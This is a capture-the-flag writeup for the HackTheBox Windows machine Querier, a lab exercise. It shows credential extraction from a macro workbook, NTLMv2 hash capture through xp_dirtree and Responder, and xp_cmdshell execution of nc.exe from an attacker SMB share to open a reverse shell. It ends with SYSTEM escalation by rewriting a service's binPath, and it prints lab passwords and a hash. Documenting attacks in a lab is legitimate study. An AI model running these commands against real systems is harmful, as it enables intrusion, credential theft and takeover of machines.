Querier Writeup

06 May 2023 #CTF #HTB #box #medium #windows

querier info



$ sudo nmap -sC -sV
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-info: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info: 
|     Target_Name: HTB
|     NetBIOS_Domain_Name: HTB
|     NetBIOS_Computer_Name: QUERIER
|     DNS_Domain_Name: HTB.LOCAL
|     DNS_Computer_Name: QUERIER.HTB.LOCAL
|     DNS_Tree_Name: HTB.LOCAL
|_    Product_Version: 10.0.17763
|_ssl-date: 2023-05-06T15:18:23+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-05-06T15:04:38
| Not valid after:  2053-05-06T15:04:38
| MD5:   78b041938cf45306d13a118c01f8e0fd
|_SHA-1: 0891cf4987dddbfd7f07211707db9c7da051a800
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-05-06T15:18:18
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required


Let's see if we can list shares anonymously:

$ smbclient -NL

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        Reports         Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

There is this 'Reports' share which is not default:

$ smbclient -N //
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Jan 29 00:23:48 2019
  ..                                  D        0  Tue Jan 29 00:23:48 2019
  Currency Volume Report.xlsm         A    12229  Sun Jan 27 23:21:34 2019
smb: \> get "Currency Volume Report.xlsm"

Only one file here, a Microsoft Excel workbook. The .xlsm extension marks it as a macro-enabled workbook.

Macro Analysis

We can run exiftool to confirm that this is indeed a macro enabled document:

$ exiftool 'Currency Volume Report.xlsm'
MIME Type         : application/vnd.ms-excel.sheet.macroEnabled.12
Creator           : Luis
Last Modified By  : Luis

We also get a potential username.

We'll use olevba from oletools to extract the macros from this document:

$ olevba 'Currency Volume Report.xlsm'
Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
conn.ConnectionTimeout = 10

There is a database connection string in this macro, with credentials for the MSSQL instance we saw listening on port 1433.
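Hard-coded connection strings are the thing to look for when triaging a macro like this. The following Python is an added example, not part of the original writeup: it parses ODBC-style connection strings (including brace-quoted values, which may contain semicolons) and pulls them out of olevba output, reporting server and database while redacting the credential fields. The sample input is the macro text recovered above.

```python
import re

# Keys whose values are credentials; ODBC accepts several spellings.
SECRET_KEYS = {"pwd", "password", "uid", "user id", "user", "accesstoken"}

def parse_odbc_connection_string(conn_str):
    """Parse 'Key=Value;Key={Value; with ; inside}' into a dict.
    ODBC keys are case-insensitive, so they are lower-cased here."""
    result, i, n = {}, 0, len(conn_str)
    while i < n:
        eq = conn_str.find("=", i)
        if eq == -1:
            break
        key = conn_str[i:eq].strip().lower()
        i = eq + 1
        if i < n and conn_str[i] == "{":            # brace-quoted value
            end = conn_str.find("}", i)
            if end == -1:
                raise ValueError("unterminated '{' in connection string")
            value = conn_str[i + 1:end]
            i = conn_str.find(";", end + 1)          # skip to next separator
            i = n if i == -1 else i + 1
        else:
            end = conn_str.find(";", i)
            end = n if end == -1 else end
            value = conn_str[i:end].strip()
            i = end + 1
        if key:
            result[key] = value
    return result

# VBA string literal assigned to a ConnectionString property; "" escapes a quote.
VBA_CONN = re.compile(r'ConnectionString\s*=\s*"((?:[^"]|"")*)"', re.IGNORECASE)

def find_connection_strings(vba_source):
    """Scan olevba output (or raw VBA) and return one finding per connection string."""
    findings = []
    for m in VBA_CONN.finditer(vba_source):
        fields = parse_odbc_connection_string(m.group(1).replace('""', '"'))
        findings.append({
            "server": fields.get("server"),
            "database": fields.get("database"),
            "credential_fields": sorted(k for k in fields if k in SECRET_KEYS),
            "redacted": {k: ("<redacted>" if k in SECRET_KEYS else v) for k, v in fields.items()},
        })
    return findings

# Constructed sample: the macro lines olevba recovered from the workbook above.
SAMPLE_VBA = '''Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
conn.ConnectionTimeout = 10
'''

if __name__ == "__main__":
    for finding in find_connection_strings(SAMPLE_VBA):
        print(finding)
```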


Let's use impacket's mssqlclient to access the DB:

$ impacket-mssqlclient -windows-auth 'reporting:PcwTWTHRwryjc$c6@QUERIER'

We must use the -windows-auth flag so that mssqlclient authenticates with a Windows account (NTLM) rather than a SQL Server login.

Let's take a look at the databases we have access to:

SQL> select name from sys.databases


Only this volume database is non-default. Let's see if it has any tables:

SQL> use volume
[*] ENVCHANGE(DATABASE): Old Value: volume, New Value: volume
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'.
SQL> select table_name from information_schema.tables


Looks like it's completely empty.

We should also check whether our login is a member of the sysadmin server role (which is what we would need to run OS commands):

SQL> select IS_SRVROLEMEMBER('sysadmin')


But we are not.


Steal Hash

Another thing we can try is to make the SQL Server service account authenticate to our box, capture its NTLMv2 response and crack it offline. We'll use responder to do that:

$ sudo responder -I tun0

Now use the xp_dirtree stored procedure to list files inside of our fake share:

SQL> xp_dirtree '\\\asdf\asdf'

The share name and file name don't matter, we can put anything here.

We see the challenge response instantly in responder:

[SMB] NTLMv2-SSP Client   :
[SMB] NTLMv2-SSP Username : QUERIER\mssql-svc
[SMB] NTLMv2-SSP Hash     : mssql-svc::QUERIER:41586128dc6fe487:D6CA022726EB8A90BB6F01847EC4DDB5:0101000000000000001F6FEBE380D9010445F82672EEA3460000000002000800570043003900580001001E00570049004E002D003000420051004200450032005300330051004300450004003400570049004E002D00300042005100420045003200530033005100430045002E0057004300390058002E004C004F00430041004C000300140057004300390058002E004C004F00430041004C000500140057004300390058002E004C004F00430041004C0007000800001F6FEBE380D90106000400020000000800300030000000000000000000000000300000AEDB4694C82FFF306151BA2E748FD745CC843DB122E0674079741A67221E2BAD0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E003800000000000000000000000000

Copy this to a file and throw it to hashcat (NetNTLMv2 is hash mode 5600; recent hashcat versions detect it automatically):

$ hashcat hash.txt /usr/share/wordlists/rockyou.txt

Abuse Service Account

Let's login again with our new account:

$ impacket-mssqlclient 'mssql-svc:corporate568@QUERIER' -windows-auth

Again, -windows-auth to use the local Windows account.

Let's once again check the access level:

SQL> select is_srvrolemember('sysadmin')


This time we have sysadmin privileges (not surprising since this is the MSSQL service account).

This means we can use xp_cmdshell to execute commands on the server. But first we need to enable it. Impacket's mssqlclient has a special command for that purpose:

SQL> enable_xp_cmdshell
[*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.

Now that it is enabled, we can use it:

SQL> xp_cmdshell whoami



To get a reverse shell, we'll use nc.exe (you can get it from here) which will be hosted on a SMB share using impacket's smbserver:

$ impacket-smbserver -smb2support -username asdf -password asdf public /opt/drop

/opt/drop is the directory where I store all tools that I might want to transfer.

Let's authenticate to our share:

SQL> xp_cmdshell net use \\\public /user:asdf asdf

The command completed successfully.


Now we can execute nc.exe from that share:

SQL> xp_cmdshell \\\public\nc.exe 443 -e cmd.exe


Running a privesc script like winpeas gives some interesting results:

C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
    Found C:\ProgramData\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
    UserName: Administrator
    NewName: [BLANK]
    cPassword: MyUnclesAreMarioAndLuigi!!1!
    Changed: 2019-01-28 23:12:48
    Found C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
    UserName: Administrator
    NewName: [BLANK]
    cPassword: MyUnclesAreMarioAndLuigi!!1!
    Changed: 2019-01-28 23:12:48

    RmSvc: GenericExecute (Start/Stop)
    UsoSvc: AllAccess, Start

It found a password for the Administrator account in Group Policy Preference files. The password is stored encrypted (the cPassword attribute), but Microsoft published the AES key used to encrypt it, so winpeas simply decrypts it (they do be like that sometimes). The feature was removed in MS14-025, but old Groups.xml files and the local Group Policy history cache, as here, survive:

$ evil-winrm -i -u administrator -p 'MyUnclesAreMarioAndLuigi!!1!'
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami

We can also use psexec or wmiexec of course.

Interestingly, my crackmapexec (version 5.4.0 from Kali repos) didn't work with these creds:

$ crackmapexec winrm -u administrator -p 'MyUnclesAreMarioAndLuigi!!1!'
SMB    5985   QUERIER          [*] Windows 10.0 Build 17763 (name:QUERIER) (domain:HTB.LOCAL)
HTTP    5985   QUERIER          [*]
WINRM    5985   QUERIER          [-] HTB.LOCAL\administrator:MyUnclesAreMarioAndLuigi!!1!

$ crackmapexec smb -u administrator -p 'MyUnclesAreMarioAndLuigi!!1!'
SMB    445    QUERIER          [*] Windows 10.0 Build 17763 x64 (name:QUERIER) (domain:HTB.LOCAL) (signing:False) (SMBv1:False)
SMB    445    QUERIER          [-] HTB.LOCAL\administrator:MyUnclesAreMarioAndLuigi!!1! STATUS_NO_LOGON_SERVERS

Not sure why.

We also have full access to the UsoSvc service:

C:\>sc qc UsoSvc
[SC] QueryServiceConfig SUCCESS

        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START  (DELAYED)
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k netsvcs -p
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Update Orchestrator Service
        DEPENDENCIES       : rpcss
        SERVICE_START_NAME : LocalSystem

SERVICE_START_NAME shows that it runs as SYSTEM, and the AllAccess right winpeas reported lets us change its configuration. To exploit this, we modify the binary path to execute nc.exe and restart the service to get a reverse shell.

C:\>copy \\\public\nc.exe C:\ProgramData\nc.exe
C:\>sc.exe config UsoSvc binPath= "cmd.exe /c C:\ProgramData\nc.exe 1337 -e cmd.exe"
[SC] ChangeServiceConfig SUCCESS

C:\>sc.exe stop UsoSvc
        TYPE               : 30  WIN32
        STATE              : 3  STOP_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x3
        WAIT_HINT          : 0x7530

C:\>sc.exe start UsoSvc
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

I couldn't find a way to make it execute nc.exe from our SMB share so I had to copy it to the box.

Error 1053 is expected: nc.exe is not a real service binary and never reports back to the Service Control Manager, but it has already been launched by then. We get our shell right away:

nt authority\system

It's always a good idea to restore the service to its original state after exploiting it: set binPath back to the BINARY_PATH_NAME shown in the sc qc output above, since the Update Orchestrator stays broken until you do and the modified path is an obvious indicator for anyone reviewing the service configuration.

Key Takeaways